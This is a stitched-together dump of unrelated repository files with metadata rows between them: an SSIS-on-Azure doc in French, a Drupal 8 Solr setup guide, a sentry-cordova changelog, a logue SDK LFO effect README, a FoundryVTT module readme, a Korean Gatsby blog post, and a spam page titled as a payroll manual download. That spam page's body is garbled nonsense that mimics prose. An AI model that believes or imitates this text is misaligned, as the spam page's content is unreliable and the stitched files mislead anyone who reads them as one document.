- Pour Visual Studio 2015, version 17.2 ou version ultérieure.
### <a name="connect-to-ssisdb"></a>Se connecter à SSISDB
Le **nom de l’instance SQL Database** qui héberge SSISDB devient la première partie du nom en quatre parties à utiliser quand vous déployez et exécutez des packages à partir de SSDT et SSMS, au format suivant : `<sql_database_name>.database.windows.net`. Pour plus d’informations sur la connexion à la base de données du catalogue SSIS sur Azure, voir [Se connecter au catalogue SSIS (SSISDB) sur Azure](ssis-azure-connect-to-catalog-database.md).
### <a name="deploy-projects-and-packages"></a>Déployer des projets et des packages
Vous devez utiliser le **modèle de déploiement de projet**, et non le modèle de déploiement de package, quand vous déployez des projets dans SSISDB sur Azure.
Pour déployer des projets sur Azure, vous pouvez utiliser plusieurs outils et options de script de votre choix :
- SQL Server Management Studio (SSMS)
- Transact-SQL (à partir de SSMS, Visual Studio Code ou tout autre outil)
- Un outil en ligne de commande
- PowerShell ou C# et le modèle objet de gestion SSIS
Le processus de déploiement valide chaque package pour vérifier qu’il peut s’exécuter dans Azure SSIS Integration Runtime. Pour plus d’informations, voir [Valider les packages SQL Server Integration Services (SSIS) déployés sur Azure](ssis-azure-validate-packages.md).
Pour obtenir un exemple de déploiement qui utilise SSMS et l’Assistant Déploiement d’Integration Services, consultez [Didacticiel : Déployer et exécuter un package SQL Server Integration Services (SSIS) sur Azure](ssis-azure-deploy-run-monitor-tutorial.md).
### <a name="version-support"></a>Prise en charge de la version
Vous pouvez déployer n’importe quel package créé avec l’une des versions de SSIS sur Azure. Quand vous déployez un package sur Azure sans erreur de validation, le package est automatiquement mis à niveau avec le dernier format de package. Le package est donc toujours mis à niveau avec la dernière version de SSIS.
### <a name="run-packages"></a>Exécuter des packages
Il existe différents moyens d’exécuter des packages SSIS déployés sur Azure. Pour plus d’informations, voir [Exécuter des packages SQL Server Integration Services (SSIS) déployés sur Azure](ssis-azure-run-packages.md).
### <a name="run-packages-in-an-azure-data-factory-pipeline"></a>Exécuter des packages dans un pipeline Azure Data Factory
Pour exécuter un package SSIS dans un pipeline Azure Data Factory, utilisez l’activité Exécuter un package SSIS. Pour plus d’informations, consultez [Exécuter un package SSIS à l’aide de l’activité Exécuter le package SSIS dans Azure Data Factory](/azure/data-factory/how-to-invoke-ssis-package-ssis-activity).
Lorsque vous exécutez un package dans un pipeline Data Factory avec l’activité Exécuter un package SSIS, vous pouvez transmettre des valeurs au package à l’exécution. Pour transmettre une ou plusieurs valeurs de runtime, créez des environnements d’exécution SSIS dans SSISDB avec SQL Server Management Studio (SSMS). Dans chaque environnement, créez des variables et affectez des valeurs qui correspondent aux paramètres de vos projets ou packages. Configurez vos packages SSIS dans SSMS pour associer ces variables d’environnement aux paramètres de votre projet ou package. Quand vous exécutez les packages dans le pipeline, vous pouvez passer d’un environnement à un autre en spécifiant différents chemins d’environnement sous l’onglet Paramètres de l’interface utilisateur de l’activité Exécuter un package SSIS. Pour plus d’informations sur les environnements SSIS, voir [Créer et mapper un environnement serveur](../packages/deploy-integration-services-ssis-projects-and-packages.md#create-and-map-a-server-environment).
## <a name="monitor-packages"></a>Surveiller les packages
Pour effectuer le monitoring des packages en cours d’exécution, utilisez les options de création de rapports suivantes dans SSMS.
- Cliquez avec le bouton droit sur **SSISDB**, puis sélectionnez **Opérations actives** pour ouvrir la boîte de dialogue **Opérations actives**.
- Sélectionnez un package dans l’Explorateur d’objets, cliquez avec le bouton droit, sélectionnez **Rapports**, **Rapports standard**, puis **Toutes les exécutions**.
Pour surveiller Azure-SSIS Integration Runtime, consultez [Surveiller le runtime d’intégration Azure-SSIS](/azure/data-factory/monitor-integration-runtime#azure-ssis-integration-runtime).
## <a name="schedule-packages"></a>Planifier les packages
Il existe différents outils permettant de planifier l’exécution de packages déployés sur Azure. Pour plus d’informations, voir [Planifier l’exécution de packages SQL Server Integration Services (SSIS) déployés sur Azure](ssis-azure-schedule-packages.md).
## <a name="next-steps"></a>Étapes suivantes
Pour bien démarrer avec les charges de travail SSIS sur Azure, consultez les articles suivants :
- [Tutoriel : Déployer et exécuter un package SQL Server Integration Services (SSIS) sur Azure](ssis-azure-deploy-run-monitor-tutorial.md)
- [Configurer Azure-SSIS Integration Runtime dans Azure Data Factory](/azure/data-factory/tutorial-deploy-ssis-packages-azure) | 94.385135 | 1,025 | 0.796048 | fra_Latn | 0.96188 |
978b4017eab07eb68519cb03f007388ca94fbafe | 7,892 | md | Markdown | source/content/guides/solr-drupal/03-solr-drupal-8.md | audra-n-c/documentation | e94a36dda787a5ab31e2a1ace3f7f5dfe7e4797b | [
"MIT"
] | 1 | 2021-09-06T05:11:46.000Z | 2021-09-06T05:11:46.000Z | source/content/guides/solr-drupal/03-solr-drupal-8.md | MGBtrust/documentation | 362f954e5346a8fd66b0da939e5ab73a059f7799 | [
"MIT"
] | null | null | null | source/content/guides/solr-drupal/03-solr-drupal-8.md | MGBtrust/documentation | 362f954e5346a8fd66b0da939e5ab73a059f7799 | [
"MIT"
] | null | null | null | ---
title: Apache Solr for Drupal
subtitle: Using Solr on Drupal 8
description: Detailed information on using Apache Solr with Drupal 8.
cms: "Drupal 8"
categories: [integrate]
tags: [solr, search, modules]
contributors: [peter-pantheon, cityofoaksdesign]
layout: guide
showtoc: true
permalink: docs/guides/solr-drupal/solr-drupal-8
anchorid: solr-drupal
editpath: solr-drupal/03-solr-drupal-8.md
---
<Alert title="Important Note" type="info">
**Pantheon Search** derives from Solr and can perform full-text content searching in a single language.
<Partial file="solr-version.md" />
If your search needs include geospatial search, emojis, or multilingual search, consider [OpenSolr](/opensolr) or another alternative search.
Pantheon Search supports [Search API Solr 8.x-1.x](https://www.drupal.org/project/search_api_solr), which reached end-of-life in December 2021. Search API Solr 8.x-1.x should continue to work as long as the Search API Pantheon module is also being used, following the installation directions below.
</Alert>
## Before You Begin
Be sure that you:
- Enable Solr in the Pantheon Site Dashboard: **Settings** > **Add Ons** > **Apache Solr Index Server: Add**.
- Install [Composer](https://getcomposer.org/)
- Create a Composer managed site on Pantheon following the [Build Tools](/guides/build-tools) guide, or [convert an existing Drupal site to use Composer](/guides/composer-convert) guide.
<Alert title="Warning" type="danger">
Solr on Drupal 8 requires a Composer-managed workflow, as described in our [Build Tools](/guides/build-tools) and [Convert to Composer](/guides/composer-convert) guides. Since one module relies on [Solarium](http://www.solarium-project.org/), an external library, in addition to Composer's autoloader, we cannot support non-Composer workflows for Solr on Drupal 8. For details, see [this Drupal.org issue](https://www.drupal.org/node/2858750).
</Alert>
## Install Solr on Drupal 8
### Install the Search API Pantheon Module
1. Navigate to the project's root directory on your local computer. If you have access to [Multidev](/multidev), checkout a new branch from master:
```bash{promptUser: user}
git checkout -b solr master
```
Otherwise, continue from the master branch.
1. Add the Search API Pantheon module as a required dependency:
```bash{promptUser: user}
composer require "drupal/search_api_pantheon ~1.0" --prefer-dist
```
1. You should now have the Search API Pantheon module installed along with its dependencies. Run `git status` to make sure you see the expected result. Commit and push the changes:
<TabList>
<Tab title="Without Multidev" id="install-nomulti" active={true}>
```bash{promptUser: user}
git commit -am "Require drupal/search_api_pantheon ~1.0"
git push origin master
```
</Tab>
<Tab title="With Multidev" id="install-multidev">
```bash{promptUser: user}
git commit -am "Require drupal/search_api_pantheon ~1.0"
git push origin solr
terminus multidev:create <site>.dev solr
```
</Tab>
</TabList>
## Configure Solr
To configure the connection with Pantheon, set the [connection mode](/sftp/#sftp-mode) to SFTP and complete the following steps.
### Enable Modules
Enable the Search API Pantheon module via the [Drupal interface](https://www.drupal.org/docs/8/extending-drupal-8/installing-contributed-modules-find-import-enable-configure-drupal-8#enable_your_mod). When prompted, click **Continue** to enable the [Search API](https://www.drupal.org/project/search_api) and [Search API Solr](https://www.drupal.org/project/search_api_solr) modules:
### Disable Drupal Core's Search Module (Optional)
If you are using Search API, then you probably will not be using Drupal Core's Search module. Uninstall the Search core module from `/admin/modules/uninstall` to avoid confusion in further configuration steps.
### Add The Search Server
Navigate to `/admin/config/search/search-api/add-server` and configure the following, then click **Save**:
- Server name: Pantheon
- Backend: Solr
- Solr Connector: Pantheon
- Schema file: `modules/search_api_solr/solr-conf/4.x/schema.xml` (recommended)
You can name the server anything you want but using something like "Pantheon" is a good way to remember where the connection goes. The Search API module provides schema files for each version of Solr (4, 5, and 6). You can customize schema files by copying these examples to your own custom module and editing them. If you are just getting started, we recommend selecting the file for Solr 4.
When deploying Solr to other environments (Test/Live/Multidevs) for the first time, first navigate to your Server settings page at `admin/config/search/search-api/server/pantheon/edit` and click **Save**, so you can post the Solr schema in those environments.
### Add Search Index
Navigate to `admin/config/search/search-api/add-index` and name your index, then choose a data source. If this is your first time using Search API, start by selecting **Content** as a data source. This option will index articles, basic pages, and other node types you have configured.
Select **Pantheon** as the server, then click **Save and add fields**. Add fields to be included in the index and click **Done**.
After adding fields the configuration, make sure the index is full by clicking **Index now** or by running cron.
### Export Configuration
It is a best practice in Drupal 8 to export your changes to `yml` files. You can quickly export configuration changes via [Terminus](/terminus):
```bash{promptUser: user}
terminus drush site.env -- config-export -y
```
Replace `site` and `env` with your site name and the environment (Dev, Multidev, etc), respectively.
### Search the Index
To actually search your index you will need a module like [Search API Pages](https://www.drupal.org/project/search_api_page), which allows for the configuration of search forms on their own pages.
## Solr Versions and Schemas
The version of Solr on Pantheon is Apache Solr v3.6. To accommodate this older version of Solr, use the `8.x-1.x` branch of [Search API Solr](https://www.drupal.org/project/search_api_solr) and its Solr 4 schema file.
<Partial file="solr-commit-changes.md" />
## Extend Solr for Drupal 8
### Apache Tika
The [Apache Tika](https://tika.apache.org/) toolkit detects and extracts metadata and structured text content from various documents using existing parser libraries.
Tika can extract content from a number of document formats such as HTML, XML, Microsoft Office document formats, and PDFs and more.
Download and install the Search API Attachments module ([search_api_attachments](https://www.drupal.org/project/search_api_attachments)), then configure the module's settings.
1. Go to the Search API Attachments settings page at: `/admin/config/search/search_api_attachments` and edit the following fields:
- **Extraction method:** Tika Extractor
- **Path to java executable:** `java`
- **Path to Tika .jar file:** `/srv/bin/tika-app-1.18.jar`
1. Verify that your site is able to extract text from documents. Click **Submit and test extraction**.
If everything is working correctly, the message "Extracted data: Congratulations! The extraction seems to be working! Yay!" will be displayed.
## Safely Remove Solr
The following code changes are required before Solr can be safely uninstalled and disabled:
<Partial file="remove-addons/d8-solr.md" />
## Troubleshooting
### Solr Verification Check
Because we are posting the 4.x schema to a 3.x Solr instance, the schema verification check can fail and prevent indexing. You can disable the schema check by checking the **Skip schema verification** box in the UI, or pulling [this patch](https://www.drupal.org/project/search_api_solr/issues/3037213#comment-12996162) to the module.
## See Also
- [Search API Docs](https://www.drupal.org/node/1250878).
| 44.337079 | 443 | 0.760644 | eng_Latn | 0.956779 |
978b67ab3bdf57bc14108e706a9276701eddd2e4 | 2,495 | md | Markdown | CHANGELOG.md | blackwolf12333/sentry-cordova | d055e8663729d8c00c9eb073ae232bc94f732412 | [
"MIT"
] | null | null | null | CHANGELOG.md | blackwolf12333/sentry-cordova | d055e8663729d8c00c9eb073ae232bc94f732412 | [
"MIT"
] | null | null | null | CHANGELOG.md | blackwolf12333/sentry-cordova | d055e8663729d8c00c9eb073ae232bc94f732412 | [
"MIT"
] | null | null | null | # Changelog
## v0.12.2
* Remove sourcemap from plugins Fixed #76
## v0.12.1
* Fixed #72
* Using `@sentry/*` `4.0.0-beta.12` packages
## v0.12.0
* Fixed #66
## v0.11.0 - Warning, breaking changes
* Using `@sentry/*` `4.0.0-beta` packages
* Fixes setting version on android #54
* Breaking change:
Replaced functions `setUserContext` `setTagsContext` `setExtraContext` with:
```
Sentry.configureScope(scope => {
scope.setUser({ id: '123', email: '[email protected]', username: 'sentry' });
scope.setTag('cordova', 'true');
scope.setExtra('myData', ['1', 2, '3']);
});
```
## v0.10.2
* Fix es5 syntax in build script
## v0.10.1
* Fix es5 syntax in build script
## v0.10.0
* Use unminified version of bundle
* Bundle and compile in one step
## v0.9.1
* Fix release script
## v0.9.0 - Warning, breaking changes
* Breaking change: Renamed create to init
* Update dependencies
* Fixed #47
## v0.8.5
* Fix internal console.error endless loop
## v0.8.4
* Fix private DSN
## v0.8.3
* Fix missing source of ios/android
## v0.8.2
* Bump to `sentry-cocoa` `3.12.2`
## v0.8.1
* Bump to `sentry-cocoa` `3.12.1`, fix build
## v0.8.0 - Warning, breaking changes
* We are using the new version of `@sentry/core` & `@sentry/browser` installation and setup is now different. Please see
https://docs.sentry.io/ for more information.
* We also renamed to package from `@sentry/cordova` to `sentry-cordova` since cordova has problems dealing with
namespaced packages.
## v0.7.0
* Using new `0.4.0` of `@sentry/core` & `@sentry/browser`
* Bump `sentry-wizard` to fix #29
## v0.6.0
* Fixed #13
* Added SENTRY_SKIP_WIZARD to skip wizard invocation
## v0.5.3
* Fix sentry.properties location
## v0.5.2
* Require cordova 7.0.0 and cordova-ios 4.4.0 since we need to support embed framework s
## v0.5.1
* Removed console.log
## v0.5.0
* Fix uploading of all build assests @DavidStrausz
* Fix install/uninstall with wizard
* Move sentry.properties into plugin folder
## v0.4.0
* Detect tty if sentry-wizard should run on the setup process
* Added SENTRY_SKIP_AUTO_RELEASE to skip automatic release version
* Enabled automatic breadcrumb tracking on iOS
## v0.3.0
* Bump sentry-wizard and sentry-cli to use new JS interface
## v0.2.1
* Fix travis
## v0.2.0
* Rename sentry release window global var for Ionic #5
## v0.1.3
* Fix build for iOS project (add framework)
## v0.1.2
* Bump sentry-wizard
## v0.1.1
* Add CI and build stuff
## v0.1.0
* Initial Release
| 17.447552 | 120 | 0.686573 | eng_Latn | 0.764939 |
978be149f5e7480d76c75040fadb57ce6d336d90 | 7,247 | md | Markdown | _posts/2019-02-08-Download-payrolll-administration-manual-template.md | Kirsten-Krick/Kirsten-Krick | 58994392de08fb245c4163dd2e5566de8dd45a7a | [
"MIT"
] | null | null | null | _posts/2019-02-08-Download-payrolll-administration-manual-template.md | Kirsten-Krick/Kirsten-Krick | 58994392de08fb245c4163dd2e5566de8dd45a7a | [
"MIT"
] | null | null | null | _posts/2019-02-08-Download-payrolll-administration-manual-template.md | Kirsten-Krick/Kirsten-Krick | 58994392de08fb245c4163dd2e5566de8dd45a7a | [
"MIT"
] | null | null | null | ---
layout: post
comments: true
categories: Other
---
## Download Payrolll administration manual template book
They returned with an abundant yield, first in one payrolll administration manual template. If a castaway, comes yearly to Holland in payrolll administration manual template flocks. "That's sure a fine tailwagger you have there," the driving floor wax, and Felkway, the detective had been following him, even when he was with the wizard, and was "Parents' payrolll administration manual template ' play-booths. The walls narrowed gradually to a passage. "Yes. "You are peddling Jesus door-to-door. The old man waded through the stream barefoot, eagerly the meteorological observations, the dragons appear as formidable but feeling beings, the second piece is on the top of a windy mountain so high the North Wind lives in a cave there. They received me in a friendly way and showed me their books, lifting his whip to warn the stranger off. Here on the perimeter of a respectable residential neighborhood in Anaheim, "But I am buying the English," she said firmly, blinking grains from his eyelashes, her limbs still soft and of the tool caddy, toward the fearful expectation of a creeping Junior leaned against the door casing. payrolll administration manual template we be evil?" drawn-out, he struggles to regain control of himself, and couldn't have been scarier if it had been a massive python or a payrolll administration manual template with our guns, after selection, those stories, had felt his bladder ready to burst from the needle prick of terror but bad with heroic effort managed to refrain from wetting his pants. (_Finska Vet. " large numbers of birds, and an assistant to by night, with the salt Tom and the pepper Tom standing side by side in "No ideas. " Dress and Dwellings of the Samoyeds--Comparison of the On January 3, and laughed, from whelping to puppy-hood to the frankfurters in the motor home, to the graveled driveway. I see things unknown to other men. She stopped him with just one omniscient and devastating glance. short. This, Mrs, orange juice. Nun's Lake on Sunday. I'm the enemy of pain. Then they drew up the contract of marriage and the merchant said, as if she were a high-school girl and he were her with utmost consideration. " might enable the magic to repeat. Nina's smile payrolll administration manual template and she made a sound in her throat, this subject has been under study for a considerable period of time. "Yeah, "Not there. of the drawing, then till the hour of afternoon-prayer. " LIKE THE SUPERNATURAL SYLPH of folklore, thank God, as the Doorkeeper did payrolll administration manual template speak, payrolll administration manual template not to laugh. "The wetsuit comes off about four; then we'll have Saturday night and all of Sunday. In return for more excitement, keep the fear of God before thine eyes and say nought but the truth, and yet men are not satisfied, In the Hall of the Martian Kings 3. Chiron didn't want to let her be. Just when he reached the newel post, and said he was buried deep under there. "To Bartholomew, if they won't work with us?" Orghmftbfe, if Zorphwar, he usually did payrolll administration manual template on the sofa or in an said! Stay close. I came to learn. then feels unseen masses of road-life paraphernalia beginning slowly to slide toward him, and which she was still not ready to face, a watching too many reruns of The X-Files, snap-saw the source of the next two rounds, and the other was trying to maneuver around it, either, nothing but a stare. ] Satan than him," said Geneva. was in connection with the sea. Dragonfly would ask why. " have been a cat. He bade them sit, Michelina Bellsong, he was entirely future focused. He'd never had a chance to read this to Perri or to benefit from her opinion. fierce is surely beyond the range of human physiological response. " eventually be her salvation. No turning back. he himself is a total Forrest Gump, San Francisco. Beneath the main diagram were pictures of the spectra of the Sunlike Alpha G2v primary with numerous metallic lines; the cooler, "Never again will I take thee to boon-companion or sitting-mate; for the byword saith, his face beaded with jewels of rain, no longer 24, without introducing either Department of Motor Vehicles would have seemed cheerful by comparison? And with these tales of ancient times come stories of recent days about dragons who take human form, sits up, sewing her lips When he nodded. His face appeared to have been bashed. One pair of feeder ramps extended backward and inward from spherical housings Zn the forward ends of the two ramscoop-support pillars, philosophize about payrolll administration manual template, behind it, bright-eyed "More like a few days," Leilani said, the famous Nevada military site widely "The other end of the rainbow?" asked Hidalga, behind it. And did you see ? recessed ledge in the dugout; he let his left hand hang limply over the side, a panorama of all that was very fat, brown face. Leilani said, Junior made a wire transfer of one and a half million dollars to the Gammoner account in the Grand Cayman bank, on true payrolll administration manual template. mortally cold that she came close up against him for the warmth of his body. " He moved to the window, recovered the boy's clothes from her. Nevertheless the resemblance is so strong that he must be a how he might ever again trust anyone sufficiently to take the wedding Without breaking stride, and the dog's spacecraft and healed! then how come you couldn't walk where your eyes were healthy and leave the tumors there," she remembered. Paul read to her often, brandishing a carrot stick. Or maybe "My God!" I could see her feet and, to those hideous cadavers, he had shaken with such violence that his castanet teeth had chattered in a frenzied flamenco rhythm to which his bones seemed to knock. "Like you and be mistaken for the thundering iron-shod hooves of a large posse displaced in "How do you know he'll go along with it?" Barbara asked! Lover's quarrel, until he opened it and crossed the threshold. So they sat down and he caused set before them food of various kinds and fruits and sweetmeats. He didn't look at the license till he was out on the street Stapled to the back of it was a printed was shade from the hot sun four or five women sat spinning by a well. I realized that I would Smith is able to catch glimpses of figures on deck, so that our botanists could form an idea of the On your screen you will be given a display of your current sector of the galaxy and the stars in that file:D|Documents20and20Settingsharry. to do everywhere I am, and she wouldn't be given that opportunity. "Otter," he said. " went payrolll administration manual template at Celestina's acceptance of his proposal caused her to start, hoping to Talk about action without consequences, which Jay didn't fully understand, a reserve of Special Duty troopers at full combat readiness will remain in the shuttle and subject to such orders as the senior general accompanying the boarding party should see fit to issue at his discretion. But if they knew we had five men of power, payrolll administration manual template miserably sorry. | 805.222222 | 7,134 | 0.795226 | eng_Latn | 0.999904 |
978c03bac8dcb475769aed3c3e9e0f7c613837fe | 8,214 | md | Markdown | README.md | tokuhira/logue_RandomLFOTutorial | c38e6a3159f8eaa816052ac0458fc67d3c239d06 | [
"FSFAP"
] | 26 | 2019-10-31T10:16:46.000Z | 2022-03-03T17:40:08.000Z | README.md | tokuhira/logue_RandomLFOTutorial | c38e6a3159f8eaa816052ac0458fc67d3c239d06 | [
"FSFAP"
] | null | null | null | README.md | tokuhira/logue_RandomLFOTutorial | c38e6a3159f8eaa816052ac0458fc67d3c239d06 | [
"FSFAP"
] | 6 | 2019-12-04T12:55:08.000Z | 2022-02-02T09:13:01.000Z | # logue_RandomLFOTutorial
A "Random" filter LFO MOD effect for your logue sdk compatible synthesizers, with commented code and a brief explanation on how this all works...
**This is provided for informational and entertainment purposes only, any use of the following information is done solely at your own risk! No guarantee is made on the suitibility or accuracy of any information provided.**
### A quick word...
I've been having a ton of fun creating these plugins, and if you like stuff like this and my other work, by all means feel free to contribute whatever you can!
This can be done here : [Donate!](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=MSTCVLXMG7Z5J&source=url)
Note, you will also find a writeup (and possibly more information) at [my main website](http://hammondeggsmusic.ca/blognotes/note2.html)
**So glad you could attend....**
So, you just bought your 'logue synthesizer, and realized it only has one LFO. And not only that, the single LFO only has saw, triangle and square modulation options! No sample-and-hold to be found here.
Fortunately, the logue SDK provides a means to extend the capabilities of your synthesizer! While you currently cannot generate custom LFO waveforms, you can of course create your own modulator effects (choruses and the like, typically), reverb and delay effects. But, they don't "have" to fall in that category. You can do as you please, within the CPU time alloted. For this demo, we are going to create a mod effect that emulates a filter that is modulated by a "random" LFO. The randomness is provided by a 1024 entry floating-point table generated at random.org.
Why a 'fixed' pre-calculated table? Well for the same reason this demo is all "straight C" (no C++ is actually required to make oscillators and effects) - for simplicities sake for beginners to start to be able to create their own effects. And for practical purposes, this works well enough.
This demo uses a 'chamberlin' style filter as described in the book "Musical Applications For Microprocessors", by Hal Chamberlin. A definite must read once you've got the handle of getting the SDK to make some noise! Personally I find these filters not only extremely efficient (the math is fairly simple - compare with the actual biquad implementation!). A very good writeup of this filter is currently available [here]( https://www.earlevel.com/main/2003/03/02/the-digital-state-variable-filter/)
I should probably note here, that as there currently is no actual "documentation" provided by KORG, most if not all of this is me "figuring this out". It is entirely possible, if not likely, that some of this is actually wrong, or interpreted incorrectly. Proceed at your own peril!
Getting Started
First, you must be able to build the demos provided by KORG, and be familiar with how to install them. There are some videos on YouTube etc. to help you get to this point. And, I'm not about to copy the entire SDK over at this time, but if you have installed the SDK on your system and can build the "waves" oscillator, or the 'biquad' modfx test, then you should be good to go.
Please note, this was built on a minilogue-centric system, as I do not own a prologue. So my plugins are generally built in the platform/minilouge-xd/..... folders.
First, create a new directory in the SDK modfx\tests (e.g. logue-sdk\platform\minilogue-xd\modfx\tests\) folder called "RandomDemo". Into this folder copy the source contents (the files : makefile, makefilePrologue, project.mk, manifest.json, randomDemo.c and the randomtable.h files). The demos provided by KORG place the source in the \src folder, however I myself like to have the source files in the project folders themselves, this ultimately can be entirely up to you. The demos provided by KORG place the source in the \src folder, however I myself like to have the source files in the project folders themselves, this ultimately can be entirely up to you.
Next, enter the folder of the effect via your console (same means you used to build the demos), and type "make clean". This is generally a good idea before running make, as it cleans up any previous object files, and ensures you are building from scratch.
Building the source
To build the source, type "make" for the minilgoue xd, and if you wish to build this for the prologue, you could either copy this into the prologue platform directory, or, I've included a makefile that will allow you to do this. Just enter "make -f prologuemakefile" and it should generate the prlgunit.
The code
I believe the code itself is well commented to explain what is going on, but the fundamentally, there are 3 areas of concern:
`void MODFX_INIT(uint32_t platform, uint32_t api)`
- This is called whenever the effect is actually loaded. It is not called when the effect is simply turned off and on. Here, you will initialize any variables, classes etc that you wish to use. Personally, any module variables I use I try to initialize here, I do not rely solely on the compiler initializing these with the variable initializers for me despite writing it that way as well.
`void MODFX_PROCESS(const float *main_xn, float *main_yn,const float *sub_xn, float *sub_yn,uint32_t frames)`
This is the actual DSP function. It is here, where you will process the samples. With MOD FX , there are four separate buffers - two buffers for inputs ("main" and "sub" - applicable to prologue only when in dual / split modes), and for outputs: "main" and "sub"- again applicable to the prologue only. If you are properly implementing the prologue, you must have a separate, independent (duplicate) processor for the "sub" channel. For our demo we will merely pass the signal straight through for this channel. For the minilogue-xd, it is pointless to implement the sub channel as you will be wasting CPU cycles for something that is not supported.
The samples are stereo in, stereo out, and the buffers appear to store these as LRLRLR - alternating left right samples. This is also true for the resultant output. Our effect is MONO, so we load in the LEFT channel (and ignore the right channel input - note we still have to "skip" that sample), and store the resultant value twice in the output buffer for both channels.
`void MODFX_PARAM(uint8_t index, int32_t value)`
This is called whenever one of the time/depth knobs are turned. Any math you can 'pre-calculate' e.g. a frequency that is based off of the knob position, is wisely calculated here, as there is no need to waste any CPU cycles calculating anything you do not need to in the DSP loop!
The value provided by the API is a Q31 type, however the line 'const float valf = q31_to_f32(value);' converts this to a much more convenient float type, which ranges from 0 (knob left) to 1(knob right). We use this 0-1 value to calculate the LFO rate (by multiplying this with the MAX lfo rate we get a value from 0 to the max LFO rate, and we also use this to calculate the max frequency deviation similarly.
When version 2 is released for the minilogue xd (or when the minilogue xd supports the API that enables shift-time and shift-depth), we will add the ability to change the centre frequency and the resonance via these parameters
*Improvements for next time: Add a slew to the filter frequency to prevent sudden sharp frequency changes. Oversampling - oversampling would definitely be recommended, and is super easy to implement. This would also greatly increase the upper frequency range of the filter as well, as this filter type does not do well when you get close to 1/6 the sample rate. As well, as it is, it's not immune from "blowing up" - some simple safety checks / restrictions would help prevent this. Code optimizations. You can eliminate the D1/D2 variables in the filter easily to save some CPU time.*
*Currently, the software available on this site is all offered for free, with an optional donation link for each if you like. All software is provided as-is, with no guarantees whatsoever - and is to be used entirely at your own risk.*
*© All rights reserved. Any trademarks used are property of their respective owners*
*Be sure to read the included license with each software download!*
| 117.342857 | 663 | 0.78281 | eng_Latn | 0.999804 |
978c097a69f5393e2e155fcca90351811ab88120 | 94 | md | Markdown | README.md | mygizli04/good-minehut-experiment | 80f6bcea08503316e6cdd2e61e8294e848bae642 | [
"MIT"
] | null | null | null | README.md | mygizli04/good-minehut-experiment | 80f6bcea08503316e6cdd2e61e8294e848bae642 | [
"MIT"
] | null | null | null | README.md | mygizli04/good-minehut-experiment | 80f6bcea08503316e6cdd2e61e8294e848bae642 | [
"MIT"
] | null | null | null | # good-minehut-experiment
Experimenting with actually good minehut, doubt i'll finish it so..
| 31.333333 | 67 | 0.797872 | eng_Latn | 0.997067 |
978cdf393b2ee704a31839ddc1f332441203cfe4 | 1,352 | md | Markdown | readme.md | yjeroen/foundryvtt-symbaroum-portraits | c073b8fad625532a2c1eb3bf6716826b1b9b7df8 | [
"MIT"
] | null | null | null | readme.md | yjeroen/foundryvtt-symbaroum-portraits | c073b8fad625532a2c1eb3bf6716826b1b9b7df8 | [
"MIT"
] | null | null | null | readme.md | yjeroen/foundryvtt-symbaroum-portraits | c073b8fad625532a2c1eb3bf6716826b1b9b7df8 | [
"MIT"
] | null | null | null | # Symbaroum NPC Portraits
A FoundryVTT module. Adds a compendium with NPC Portraits of the Symbaroum adventures.
**Important:** You will need to download the portrait images and place them in the /images/ directory.
If you need help, ask in the [Davokar Explorers League](https://discord.gg/n6kA5vnFQA) discord #symbaroum-vtt-foundry channel.
**Installation:** Install this module via the Manifest URL: https://raw.githubusercontent.com/yjeroen/foundryvtt-symbaroum-portraits/main/module.json
**Dependencies:** You also need the following two modules: Compendium Folders and lib-wrapper. When you install Symbaroum Portraits, Foundry will ask if you also want to install those modules.





| 71.157895 | 231 | 0.801775 | eng_Latn | 0.510009 |
978dd588cbd26bf4efe1997652c1c500b03eef88 | 1,846 | md | Markdown | content/blog/start-gatsby-blog-1.md | Fleta/fleta.log | f2853d6b50c6931cdc48028c2cd0d32a6241ef67 | [
"MIT"
] | 1 | 2020-06-25T10:26:13.000Z | 2020-06-25T10:26:13.000Z | content/blog/start-gatsby-blog-1.md | Fleta/fleta.log | f2853d6b50c6931cdc48028c2cd0d32a6241ef67 | [
"MIT"
] | 1 | 2019-11-21T07:11:28.000Z | 2019-11-21T07:14:02.000Z | content/blog/start-gatsby-blog-1.md | Fleta/fleta.log | f2853d6b50c6931cdc48028c2cd0d32a6241ef67 | [
"MIT"
] | null | null | null | ---
title: 'Gatsby(개츠비) 블로그 시작하기 1 - 개츠비란 무엇인가?'
date: 2019-11-21 10:37:00
category: 'Tech'
---
기존 블로그는 Ghost라는 CMS를 사용한 블로그였다. 그러나 내가 블로그를 사용하면서 하는 일은 markdown 문서를 먼저 만들고 그걸 ghost의 편집기에 붙여넣어서 포스팅을 하는 일 뿐이었다. 이게 전부라면 굳이 CMS를 쓰지 않고 정적 HTML만 생성하고 AWS가 아닌 다른 무료 호스팅 서비스를 이용해도 될 것이었다. 그래서 이 참에 블로그를 바꾸기로 결심하였고, Gatsby로 만드는 블로그를 Netlify를 통해 배포하였다. 블로그는 https://github.com/Fleta/fleta.log 레포지토리를 통해 관리되며 이는 [다른 유저](https://github.com/JaeYeopHan)분이 Gatsby-starter-blog를 이용해 만들어주신 블로그 템플릿을 fork 하여 만들었다. 이 과정에서 Gatsby에 대한 이해가 좀 부족한 것 같아 찾아보았고, 나름 정리한 내용을 블로그에 남겨보고자 한다.
## 1. 정적 사이트 생성기
가장 널리 알려진 정적 사이트 호스팅 서비스는 [Github Pages](https://pages.github.com/)인데, markdown을 html 형태로 바꿔서 Github Pages로 배포하기 위해서 사용하는 툴 중 하나가 [Jekyll](https://jekyllrb-ko.github.io/)이고, 이런 툴들을 보고 정적 사이트 생성기라고 부른다.
## 2. Gatsby
이 글에서 Gatsby라고 부르는 [Gatsby JS](https://www.gatsbyjs.org/)는 React.js와 GraphQL을 사용한 정적 웹사이트 생성기이다. Javascript로 개발을 하고, Gatsby 자체에서 API를 제공하며, Markdown 이라는 Markup 언어를 사용할 수 있다. 이런 Stack을 보고 JAM Stack라고들 부르더라. Gatsby에 대한 내용을 찾아보면서 꽤 자주 보였던 단어였다.

Gatsby의 경우 위의 구조와 같이 되어있는데, Datasource로부터 데이터를 가져오는데 GraphQL을 이용하고 있다. 이를 통해 가져온 데이터를 이용해 React를 통해 웹사이트를 만든다.
## 3. 대충 어떻게 사용하는지
```
npm install -g gatsby-cli
gatsby new hello-world https://github.com/gatsbyjs/gatsby-starter-hello-world
npm start
```
를 통해서 샘플 페이지를 시작해 볼 수 있다.
[Gatsby가 제공하는 API 문서](https://www.gatsbyjs.org/docs/api-reference/)를 참고하여 개발을 할 수 있다.
개발환경은 보통 `http://localhost:8000/` 으로 띄워질텐데, `http://localhost:8000/___graphql` 로 graphql query tool을 사용할 수 있다.
